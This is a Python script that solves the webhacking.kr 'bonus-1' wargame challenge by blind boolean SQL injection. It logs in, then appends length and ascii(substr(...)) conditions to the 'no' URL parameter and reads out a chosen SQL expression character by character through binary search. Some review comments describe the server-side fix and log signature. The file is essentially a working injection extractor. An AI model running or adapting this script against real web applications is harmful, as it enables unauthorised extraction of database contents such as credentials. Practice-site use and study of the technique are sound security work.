import requests
import sys
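def main():
    """Command-line entry point: log in, then run the extraction for one expression.

    Expects exactly three arguments after the script name: the account id,
    the account password, and the SQL expression passed on to ``query``.
    Prints a usage line and returns when the argument count is wrong.
    """
    if len(sys.argv) != 4:
        # The length check accepts exactly three arguments, so the usage line
        # lists three; the old text advertised a fourth "(url)" that is never read.
        print("usage : {Path} (id) (pw) (param)".format(Path=sys.argv[0]))
        return
    # NOTE(review): a password passed on argv is visible in the local process
    # listing and is kept in shell history; prompting with getpass would avoid that.
    user_id, password, param = sys.argv[1:4]
    query(login(user_id, password), param)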
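def login(id, pw):
    """Log in to webhacking.kr and return the first response cookie as a dict.

    Args:
        id: account id, sent as the ``id`` form field.
        pw: account password, sent as the ``pw`` form field.

    Returns:
        A one-entry ``{name: value}`` dict built from the Set-Cookie header
        (presumably the session cookie), in the form ``requests`` accepts
        for its ``cookies=`` argument.

    Exits the process with status 1 when the response body contains the
    failure marker (a long run of ``=``) or carries no usable Set-Cookie header.
    """
    form = {'id': id, 'pw': pw}
    # NOTE(review): this is plain http://, so the credentials and the cookie
    # that comes back cross the network unencrypted. Prefer https:// if the
    # site serves it - confirm before switching.
    # A timeout keeps a stalled connection from hanging the script forever.
    response = requests.post('http://webhacking.kr', data=form, timeout=10)
    if "===========================================" in response.text:
        print("Login Fail !")
        sys.exit(1)

    header = response.headers.get('set-cookie')
    if not header or '=' not in header:
        # Previously this path crashed with AttributeError/ValueError.
        print("Login Fail ! (no cookie in response)")
        sys.exit(1)

    print('id : ' + form['id'] + '\tLogin Success !')
    name, _, rest = header.partition('=')
    # Drop cookie attributes ("; path=/ ...") so only the value is replayed.
    return {name: rest.split(';', 1)[0]}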
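def query(cookie, param):
    """Recover the value of SQL expression *param* from a true/false response.

    Works against the webhacking.kr ``bonus-1`` practice challenge. Each probe
    appends a boolean condition to the ``no`` query parameter and treats a
    response whose lower-cased body contains ``true`` as "condition holds".
    First the length is found by testing 1..59 in order, then each character
    is located by binary search on its ASCII code.

    Args:
        cookie: cookie dict passed to every request (as returned by ``login``).
        param: SQL expression whose string value is being read.

    Prints progress and the final result; returns ``None``. Exits with
    status 1 when no length in 1..59 matches.

    Limitations visible in the search bounds: only codes 34..124 can be
    reported. A character below 34 comes out as ``"`` and one above 124 as ``|``.

    NOTE(review): this only works if the endpoint places ``no`` into its SQL
    text unescaped, which is presumably the point of the challenge. Binding
    ``no`` as a typed parameter (or casting it to an integer) server-side
    removes the true/false oracle. In access logs the run appears as up to 59
    length probes plus about seven requests per character, all identical
    except for an index and a comparison constant.
    """
    result = ''
    url = "http://webhacking.kr/challenge/bonus/bonus-1/index.php?no=2{query}&id=admin&pw"
    length_probe = " and length({p})={0}"
    char_probe = " and ascii(substr({p},{0},1))>={1}"

    def holds(condition):
        # One request per condition; the timeout stops a stalled connection
        # from blocking the whole run.
        response = requests.get(url.format(query=condition), cookies=cookie, timeout=10)
        return 'true' in response.text.lower()

    length = 0
    print("글자 수 : ", end='')
    for candidate in range(1, 60):
        if holds(length_probe.format(candidate, p=param)):
            print(str(candidate))
            length = candidate
            break

    # Was `length is 0`: identity comparison with an int literal relies on
    # CPython's small-int cache and raises SyntaxWarning on Python 3.8+.
    if length == 0:
        print("글자수 못찾음")
        # sys.exit instead of the site-provided exit(); non-zero marks failure.
        sys.exit(1)

    for position in range(1, length + 1):
        a_min, a_max = 34, 125
        # Invariant while the code is in range: a_min <= code < a_max.
        while a_max > a_min:
            mid = (a_max + a_min) // 2
            if holds(char_probe.format(position, mid, p=param)):
                a_min = mid
            else:
                a_max = mid
            # Window narrowed to a single value: a_min is the answer.
            if a_min == mid and mid + 1 == a_max:
                break
        result += chr(a_min)
        print(chr(a_min), end='')

    print("\nresult : {0}".format(result))
    return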
# Run the command-line flow only when executed as a script, not on import.
if "__main__" == __name__:
    main()